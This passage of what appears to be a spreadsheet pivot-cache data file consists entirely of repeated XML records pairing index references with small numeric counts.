  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="5"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="4"/>
    <x v="1286"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1288"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="30"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1289"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="13"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1290"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1287"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1291"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="6"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1292"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1293"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="20"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="32"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="27"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1294"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1295"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1296"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1297"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1298"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="2"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1299"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="30"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="8"/>
    <x v="1300"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="30"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1301"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1302"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1303"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="17"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="9"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1304"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="84"/>
    <x v="173"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="254"/>
    <x v="173"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="25"/>
    <x v="173"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="270"/>
    <x v="173"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="173"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="173"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="6"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1305"/>
  </r>
  <r>
